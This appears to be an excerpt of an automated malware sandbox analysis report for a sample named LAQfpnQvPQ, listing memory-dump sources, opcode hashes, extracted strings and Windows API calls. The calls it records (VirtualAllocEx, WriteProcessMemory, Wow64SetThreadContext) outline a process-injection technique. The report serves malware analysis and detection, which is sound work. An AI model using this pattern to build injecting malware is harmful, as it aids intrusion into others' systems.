                                                                          • Instruction ID: 44e82782e77d42fcb7964a1630ea294248c0bd5d55239b1430f6cde87de11cf1
                                                                          • Opcode Fuzzy Hash: f246f4059dc3deea78d3dcf6154160c1acb71df7c3579b03f3e3739bbb3c443c
                                                                          • Instruction Fuzzy Hash: E1F1EB74B00218CFDB08DFA4D998A9DB7B2FF88300F158559E806AB365DB75EC42CB91

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq$(aq$Haq
                                                                          • API String ID: 0-2456560092
                                                                          • Opcode ID: 0a926b3169af8b09540c602bda525f161480bdba1c333135e51146ecb613e3b9
                                                                          • Instruction ID: 90b64d3817363564fca4d439f2e0cf4b0e3ff96d7c49d7b14f2569a991e66ee0
                                                                          • Opcode Fuzzy Hash: 0a926b3169af8b09540c602bda525f161480bdba1c333135e51146ecb613e3b9
                                                                          • Instruction Fuzzy Hash: 4FE15174A00209DFCB05EFA4D4949ADBBB2FF89350F148569E806AB365DF70EC42CB91

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq$(aq$(aq
                                                                          • API String ID: 0-2593664646
                                                                          • Opcode ID: 95a617dca706a3bbb41d4c73866a1e173f1d3585db692b51a68eb8209518d3c0
                                                                          • Instruction ID: 3c6cee91dfe3a6a0f08bac8cc69ca6dd08592fdd679652c9c7b3bacfa4e24ca5
                                                                          • Opcode Fuzzy Hash: 95a617dca706a3bbb41d4c73866a1e173f1d3585db692b51a68eb8209518d3c0
                                                                          • Instruction Fuzzy Hash: A281F2713042568FCB159F28D854AAE3FA6EF85350B2484AAEC05CF3A6CF75DC46C7A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244585264.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q
                                                                          • API String ID: 0-3120983240
                                                                          • Opcode ID: 9d3f550ac801a5227aaf4c015b7f0f59d21cd2616e24fc3f63c5048a1df49b85
                                                                          • Instruction ID: ecabdaef1239ff72f94f785340536104e28540cf93d8bb10f4814607270518b9
                                                                          • Opcode Fuzzy Hash: 9d3f550ac801a5227aaf4c015b7f0f59d21cd2616e24fc3f63c5048a1df49b85
                                                                          • Instruction Fuzzy Hash: 0642B3F4E0020ADFCB14DFA8D598AFEBBB6FB49301F50845ADA16AB254D7385842CF51
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $]q$$]q
                                                                          • API String ID: 0-127220927
                                                                          • Opcode ID: 6b460d7cebb077b785914cb81c30f8392471c72df78fff908cc2da764f6f662a
                                                                          • Instruction ID: 17a2a4383af51d5aeb22fc25672c111ea59cb6a9fc3e1a66e272b19c9e7b51fe
                                                                          • Opcode Fuzzy Hash: 6b460d7cebb077b785914cb81c30f8392471c72df78fff908cc2da764f6f662a
                                                                          • Instruction Fuzzy Hash: 3F227CB4A0021A8FDB15DFA9C849AADBBF1FF48741F148515EC12A7396DB789D02CF90
                                                                          Strings
                                                                          Memory Dump Source
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 077FF90A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 017EA57E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          APIs
                                                                          • CopyFileA.KERNEL32(?,?,?), ref: 077F469D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 077F5411
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 017E8E9D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 077F5C54
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          APIs
                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 069FE9B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 077F5C54
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077FFEBE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,017ECBD6,?,?,?,?,?), ref: 017ECC97
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_17e0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 069F951C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077FFEBE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,017ECBD6,?,?,?,?,?), ref: 017ECC97
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_17e0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 069F951C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 0759FC9C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244369902.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7590000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069FE6F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069FE6F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 017E8E9D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_17e0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 017EA57E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_17e0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Pl]q
                                                                          • API String ID: 0-2207481929
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          • API String ID: 0-600464949
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2246049585.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7aa0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ,aq
                                                                          • API String ID: 0-3092978723
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: paq
                                                                          • API String ID: 0-3273118895
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: kRA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: kRA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244585264.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p<]q
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p<]q
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 075D1003
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 075D1003
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2246049585.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7aa0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2246049585.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7aa0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2246049585.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7aa0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: A
                                                                          • API String ID: 0-3554254475
                                                                          • Opcode ID: 0895e48b341c5236828f8dbc541975246d319b1e1a3e85bb93c8900905225b45
                                                                          • Instruction ID: f83506806d7bc5a2845876e6402831466064eb3dd93ddec34149fda38352c2f7
                                                                          • Opcode Fuzzy Hash: 0895e48b341c5236828f8dbc541975246d319b1e1a3e85bb93c8900905225b45
                                                                          • Instruction Fuzzy Hash: 23E06DB06090198FC368AF64C9946ED7771EBDA711F40429DC52FA76D1DB780E848F10
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: bc5f202c8ee75770f5119fdff96030be608febccee1ed8257c82c94188ed0e4b
                                                                          • Instruction ID: 452799030ec6b99ab9cdd8ea085f5d0fd629c95bff8244a8398e67b9ecaa74ce
                                                                          • Opcode Fuzzy Hash: bc5f202c8ee75770f5119fdff96030be608febccee1ed8257c82c94188ed0e4b
                                                                          • Instruction Fuzzy Hash: 06F07478A01628CBCBA4DF98C99479DBBB1FB98310F50519A9409B7344DA345E85DF21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7c13fe615924ff487e54a7c853afdad23027b26ab0a183f3dae0ebc616d2c2da
                                                                          • Instruction ID: ef0b4ef4b8c440e0fbe744bf2db00394540ff9d42d86b8c4cfce2fa9650bc3fa
                                                                          • Opcode Fuzzy Hash: 7c13fe615924ff487e54a7c853afdad23027b26ab0a183f3dae0ebc616d2c2da
                                                                          • Instruction Fuzzy Hash: 66120A74A00219CFCB15EF64C894BADB7B2BF89340F5485A8D80AAB365DF70ED85CB51
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f0161a8ba67be487b2e780bb3017d5074f0bac1e397b0286d4dcadf0aa5f9510
                                                                          • Instruction ID: 1ceeb5b65570d66cb7c3f1a91b7a8822c97c5666b32eec69c264c3cbbee3ee47
                                                                          • Opcode Fuzzy Hash: f0161a8ba67be487b2e780bb3017d5074f0bac1e397b0286d4dcadf0aa5f9510
                                                                          • Instruction Fuzzy Hash: EBA1ADB5B01615AFCB15CF69D458AEEBBB2FF88311F14846AE8029B351CB35D802CF50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 71f277487af04df6787174f2a0558bdcd8540909b97f6da2f5c0512b463b7e1f
                                                                          • Instruction ID: 83cb3bc515cc274d9d4ed6171f9f18223545847062da869089aa063d930b55a8
                                                                          • Opcode Fuzzy Hash: 71f277487af04df6787174f2a0558bdcd8540909b97f6da2f5c0512b463b7e1f
                                                                          • Instruction Fuzzy Hash: BD916AB0B00214DFCB14DF68C498A6DBBB6BF89750F1585A9E806DB3A5CB70EC41CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c0c50704238a06426b6abf684039967b669e6bb09711d374a27b322d9593c96c
                                                                          • Instruction ID: 31e0bf5bb0200eeaa3584e935d64c28a3287dec5e630e112fead9dfc8e68e3e2
                                                                          • Opcode Fuzzy Hash: c0c50704238a06426b6abf684039967b669e6bb09711d374a27b322d9593c96c
                                                                          • Instruction Fuzzy Hash: A38129B5A00219CFCB14DF68C48499EB7F5FF88350B158569E806DB364DB71ED82CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2b8e1364a0c36c84a61b78fe2f2285bf08d6f297289fe738e12b097e883f5171
                                                                          • Instruction ID: de5a75f8d3c03d285dccaa8e687070156cdfbeed734ffefc64aea09d83052d48
                                                                          • Opcode Fuzzy Hash: 2b8e1364a0c36c84a61b78fe2f2285bf08d6f297289fe738e12b097e883f5171
                                                                          • Instruction Fuzzy Hash: 92616D74B10604DFCB14DF68C898A6DB7B6FF88750F1585A9E8069B365CB70EC41CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f3e9cb365deb96c56d0e82bd50bd6aa1f7d4a4f0a4433c233e120e6fdd41382f
